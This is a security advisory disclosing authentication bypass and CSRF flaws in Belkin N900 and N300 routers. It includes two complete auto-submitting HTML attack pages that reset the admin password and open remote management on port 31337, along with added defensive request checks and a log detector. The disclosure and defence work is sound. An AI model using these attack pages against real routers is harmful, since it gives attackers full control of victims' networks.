Taking over the Belkin N900 and N300

  • The N900 and N300 can be trivially taken over by any adversary on the LAN or WLAN.
  • The N900 and N300 can be taken over by a remote adversary through CSRF attack.
  • If remote management is enabled (not the default), the N900 and N300 can be trivially taken over by a remote adversary.

Description

The Belkin N900 (F9K1104v1) and N300 (F7D7301v1) routers are susceptible to authentication bypass attacks. Any user with access to the web interface can execute administrative commands without providing a username or password. If remote management is enabled, this includes all users on the WAN. Administrators who have enabled remote management should disable it immediately.

Even if remote management is not enabled, the Belkin N900 and N300 routers are susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that, when executed by any user on the (W)LAN side of these routers (including an attacker who may reside on the (W)LAN), changes the administrator credentials and enables remote management services.

Local Attack Requirements

  • An attacker must have access to a machine on the local network, either by physically connecting or by compromising a machine on the local network through other means (e.g., via malware).

Remote Attack Requirements

  • Remote management must be enabled on the router.

or

  • A victim on the (W)LAN must be fooled into performing an action (e.g., by clicking an attacker-provided link), must browse to a malicious or compromised site, or must be the victim of a man-in-the-middle attack.

Details

All HTML forms present in the Belkin N900 and N300 are susceptible to Cross-Site Request Forgery.

The authentication bypass issue has been previously discovered and reported in other models of Belkin routers.

  • Vulnerable Firmware is 1.00.06 on the N300.
  • Vulnerable Firmware is 1.00.23 on the N900.
  • The Belkin web site lists an available firmware update (3.00.05) for the N300, but this update appears to contain a different model number in its file name and was rejected by the router when we attempted to update.
  • Other versions of the firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site Request Forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP "Referer" checking should be enabled.
  • Validate the HTTP Basic Authentication header on all HTTP requests.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.
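The following is an added example written for this page (it is not Belkin firmware and not ISE code) that shows the three recommendations above as server-side checks applied to every state-changing request: a per-session CSRF token, an Origin/Referer check against the router's own host, and validation of the Basic Authentication header. The endpoint paths and the 192.168.2.1 address are taken from the PoC forms in Figures 1 and 2; every other name (AdminSession, csrf_token, authorize_admin_request, the header dictionary layout) is an assumption made for this example.

```python
# Added example (not Belkin firmware and not code from the advisory): the three
# server-side checks the recommendations describe, applied to every
# state-changing request. Endpoint paths and the 192.168.2.1 address come from
# the PoC forms; all other names are assumptions made for this example.
import base64
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

ROUTER_HOST = "192.168.2.1"                              # LAN address used in the PoC
ADMIN_ENDPOINTS = {"/util_system.html", "/apply.cgi"}   # targets of Figures 1 and 2


class AdminSession:
    """One logged-in admin session; holds the unpredictable CSRF token
    (recommendation 1) that every delivered form must embed."""

    def __init__(self):
        self.csrf_token = secrets.token_hex(16)


def basic_auth_header(user, password):
    """Build the Authorization header value a browser sends for Basic auth."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def check_basic_auth(headers, expected_user, expected_password):
    """Recommendation 3: validate the Basic Authentication header on every request."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        decoded = base64.b64decode(auth[len("Basic "):], validate=True).decode()
    except ValueError:   # bad base64 (binascii.Error) or bad UTF-8 are both ValueErrors
        return False
    user, sep, password = decoded.partition(":")
    # constant-time comparisons so the check does not leak via timing
    return (sep == ":"
            and hmac.compare_digest(user.encode(), expected_user.encode())
            and hmac.compare_digest(password.encode(), expected_password.encode()))


def check_referer(headers):
    """Recommendation 2: the request must come from the router's own pages.
    Origin is preferred when present; a missing Referer is rejected, since a
    forged page can suppress it."""
    source = headers.get("Origin") or headers.get("Referer")
    return bool(source) and urlsplit(source).hostname == ROUTER_HOST


def check_csrf_token(form, session):
    """Recommendation 1: the hidden csrf_token field must match the session's token."""
    submitted = form.get("csrf_token", [""])[0]
    return hmac.compare_digest(submitted.encode(), session.csrf_token.encode())


def authorize_admin_request(method, path, headers, body, session, creds):
    """Gate one request. Returns (allowed, reason). `headers` is a dict keyed by
    canonical header name, `body` the url-encoded POST body, `creds` the
    (expected_user, expected_password) pair. Every check must pass."""
    if method != "POST" or path not in ADMIN_ENDPOINTS:
        return True, "not a state-changing admin request"
    if not check_basic_auth(headers, *creds):
        return False, "missing or invalid Basic Authentication"
    if not check_referer(headers):
        return False, "missing or cross-site Origin/Referer"
    if not check_csrf_token(parse_qs(body), session):
        return False, "missing or wrong CSRF token"
    return True, "ok"
```

Note that a browser which has cached Basic Authentication credentials attaches them to a forged request as well, so validating the header alone (the third recommendation) would not stop the submissions in Figures 1 and 2 from a victim's browser; the per-session token and the Origin/Referer check are what reject that request, while the header check stops the direct, unauthenticated submission the advisory describes.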

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attacks, we assume that our adversary is on the (W)LAN, that remote management has been enabled, or that a user on the (W)LAN has browsed to a malicious web page. In any of these cases, since HTTP Basic Authentication is not checked as part of the Belkin's processing of requests, the attacker can directly submit, or submit on behalf of a user via JavaScript or CSRF, the attack payloads shown in Figures 1 and 2. These payloads set the administrator password to the one corresponding to the included MD5 hash on the N900, or to an empty (null) password on the N300, and enable remote management on port 31337.


<html>

<head>
<title>Belkin N900 CSRF - Change Admin Creds. and Enable Remote MGMT.</title>
<!--*Discovered by: Jacob Holcomb - 
	Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="belkinN900" action="http://192.168.2.1/util_system.html"
	method="post">
<input type="hidden" name="page" value="util_system"/>
<input type="hidden" name="sHr" value="00"/>
<input type="hidden" name="Mm" value="00"/>
<input type="hidden" name="eHr" value="00"/>
<input type="hidden" name="eMm" value="00"/>
<input type="hidden" name="RemoteIP" value="..."/>
<input type="hidden" name="passwd_md5" value="f370455a8a9c05e5f6ef92c67dc3c9f7"/> 
	<!--The password must be set as a MD5 hash value. -->
<input type="hidden" name="do_save_passwd_md5" value="1"/>
<input type="hidden" name="login_timeout" value="99"/> 
	<!-- Setting session timeout -->
<input type="hidden" name="EnableRgmt" value="1"/> 
	<!-- Enable Remote Management -->
<input type="hidden" name="checkremote" value="1"/>
<input type="hidden" name="http_wanport" value="31337"/> 
	<!-- Set the Remote Management Port -->
<input type="hidden" name="EnableUPNP" value="1"/> 
	<!-- Enable UPnP -->
<input type="hidden" name="version_eb" value="0"/> 
</form>

<script>
function BeLkIn() {document.belkinN900.submit();}; 
window.setTimeout(BeLkIn, 0);
</script>

</body>
</html>

Figure 1. Attack page for N900.


<html>

<head>
<title>Belkin N300 CSRF - Change Admin Creds. and Enable Remote MGMT.</title>
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="belkinN300" action="http://192.168.2.1/apply.cgi" 
	method="post">
<input type="hidden" name="location_page" value="system.stm"/>
<input type="hidden" name="remote_mgmt_enabled" value="1"/>
<input type="hidden" name="http_passwd" value=""/> 
	<!-- Changing password to null -->
<input type="hidden" name="fw_disable" value="0"/>
<input type="hidden" name="EnableRgmt" value="on"/> 
	<!-- Enable Remote Management -->
<input type="hidden" name="allow_remote_ip" value="0"/> 
	<!-- Remote management IP restriction -->
<input type="hidden" name="http_wanport" value="31337"/> 
	<!-- Set the Remote Management Port -->
<input type="hidden" name="arc_action" value="Apply+Changes"/>
</form>

<script>
function BeLkIn300() {document.belkinN300.submit();};
window.setTimeout(BeLkIn300, 0);
</script>

</body>
</html>

Figure 2. Attack page for N300.

At this point, the attacker can remotely administer, and thereby fully control, the N900 or N300.
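For administrators who log traffic to the router's web interface, the request shapes described in this section (an administrative POST with no credentials, with a foreign or missing Referer, or from outside the LAN) can be picked out of an access log. The following is an added example written for this page, not part of the advisory or of ISE's tooling: it assumes a Combined Log Format log from a logging reverse proxy or similar device in front of the router, since the routers themselves provide no such log. The endpoint paths and the 192.168.2.1 address are from the PoC forms; the LAN range, the parser and the log lines are constructed for the example.

```python
# Added example, not part of the advisory: flag the request pattern of
# Figures 1 and 2 in a Combined Log Format access log. The routers provide
# no such log, so this assumes a logging reverse proxy or similar in front
# of the web interface. Endpoint paths and the 192.168.2.1 address are from
# the advisory; the LAN range and the log lines below are constructed.
import ipaddress
import re
from urllib.parse import urlsplit

ROUTER_HOST = "192.168.2.1"
LAN = ipaddress.ip_network("192.168.2.0/24")           # assumed LAN range
ADMIN_PATHS = {"/util_system.html", "/apply.cgi"}       # targets of the PoC forms

# Combined Log Format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample: an admin page view, a legitimate configuration save,
# then the three shapes an attack can take (CSRF with a foreign Referer,
# a scripted POST with no Referer, and a direct POST from outside the LAN).
SAMPLE_LOG = """\
192.168.2.23 - admin [13/Apr/2013:10:01:02 -0400] "GET /util_system.html HTTP/1.1" 200 5120 "http://192.168.2.1/index.html" "Mozilla/5.0"
192.168.2.23 - admin [13/Apr/2013:10:01:09 -0400] "POST /util_system.html HTTP/1.1" 200 311 "http://192.168.2.1/util_system.html" "Mozilla/5.0"
192.168.2.23 - - [13/Apr/2013:10:05:41 -0400] "POST /util_system.html HTTP/1.1" 200 311 "http://attacker.example/csrf.html" "Mozilla/5.0"
192.168.2.50 - - [13/Apr/2013:10:06:00 -0400] "POST /apply.cgi HTTP/1.1" 200 311 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Apr/2013:10:07:13 -0400] "POST /apply.cgi HTTP/1.1" 200 311 "http://192.168.2.1/system.stm" "curl/7.29"
"""


def parse_line(line):
    """Parse one Combined Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the reasons an administrative POST looks like the advisory's
    attack; an empty list means the request looks benign."""
    if entry["method"] != "POST" or entry["path"] not in ADMIN_PATHS:
        return []
    reasons = []
    # The router never validates Basic Auth, so an admin POST carrying no
    # credentials at all ("-" in the user field) is itself a bypass indicator.
    if entry["user"] == "-":
        reasons.append("admin POST without Basic Auth credentials")
    referer = entry["referer"]
    if referer == "-":
        reasons.append("admin POST without Referer")
    elif urlsplit(referer).hostname != ROUTER_HOST:
        reasons.append(f"admin POST with cross-site Referer {urlsplit(referer).hostname}")
    if ipaddress.ip_address(entry["client"]) not in LAN:
        reasons.append("admin POST from outside the LAN (remote management in use)")
    return reasons


def find_suspicious(log_text):
    """Run classify() over a log and collect the flagged entries."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append({"client": entry["client"], "path": entry["path"],
                         "time": entry["time"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["path"], "; ".join(hit["reasons"]))
```

The legitimate save on the second line passes because it carries a Basic Auth user, a Referer on the router's own host and a LAN source address; each of the last three lines fails at least one of those, which is exactly the set of conditions the recommendations to the vendor would enforce at request time.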

References

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io